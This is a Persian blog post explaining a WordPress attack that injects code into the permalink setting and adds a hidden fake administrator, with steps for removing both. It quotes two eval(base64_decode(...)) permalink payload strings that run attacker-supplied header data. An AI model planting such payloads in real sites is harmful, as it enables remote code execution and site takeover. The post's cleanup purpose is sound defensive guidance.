SQL Injection در وردپرس و نحوه جلوگیری از این حملات در وردپرس

بسیاری از سایت ها توسط حمله SQL که کدهای مخرب را به سایت شما تزریق می شوند، مورد حمله قرار می گیرند. این تزریق MySQL با بی اثر کردن پیوند های یکتا یا Permalinks بر روی سایت شما تأثیر می گذارد. در نتیجه، URL های ارسال وبلاگ شما کار نمی کند. وبلاگ های زیادی در وردپرس هدف حمله این روش قرار گرفتند.

یکی از کدهایی که به ساختار پیوند یکتا برای اهداف مخرب اضافه میشود کد ذیل میباشد:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

این نقل قول ها همه پیوندهای یکتا سایت شما ضمیمه میشود و فقط در صورت حذف دستی می توان آن را تغییر داد. اگر نحوه کار این کد مخرب را متوجه نمی شوید نگران نباشید.

نحوه مقابله یا این حملات

اگر این مشکل برای سایت شما اتفاق افتاد برای رفع این مشکل به تنظیمات> پیوندهای یکتا رفته و کد فوق را حذف کرده و آدرس پیش فرض خود را جایگزین کنید

در مرحله بعد باید به بخش کاربران مراجعه کنید، خواهید دید که بیش از یک مدیر وجود دارد. با اینکه مدیر جعلی را نخواهید دید ولی تعداد مدیر یا مدیران جعلی در قسمت شمارشی اعمال شده است. بنابراین اگر شما مدیر باشید و مدیری جعلی در سایت شما باشد تعداد مدیرکل 2 خواهد بود.

بنابراین آنچه شما باید انجام دهید این است که به همه کاربران نگاه کنید و آخرین کسی را که ثبت نام کرده است پیدا کنید. ماوس خود را بر روی آن کاربر قرار داده و لینک کاربری را دریافت کنید. کد userid= را با 1 واحد بیشتر کنید. بنابراین اگر آخرین کاربری که می توانید مشاهده کنید کاربر شماره 2 است، 1 واحد به آن اضافه کنید و آنرا 3 کنید. باید متوجه شوید که مدیر مخفی معمولا یک کد عجیب و غریب به عنوان نام دارد. کد را حذف کنید و او را مشترک کنید. سپس برگردید و او را حذف کنید.

با این کار باید مشکل برطرف شود. همچنین می توانید با رفتن به PHPMyAdmin خود او را حذف کنید. زیرا کاربر را در آنجا خواهید دید.

با اینکه این نوع حملات تازه نیستند ولی ما میخواستیم کاربران ما بتوانند به روز شوند. لطفاً مطمئن شوید که وبلاگ شما آلوده نیست.

.

دیدگاهتان را بنویسید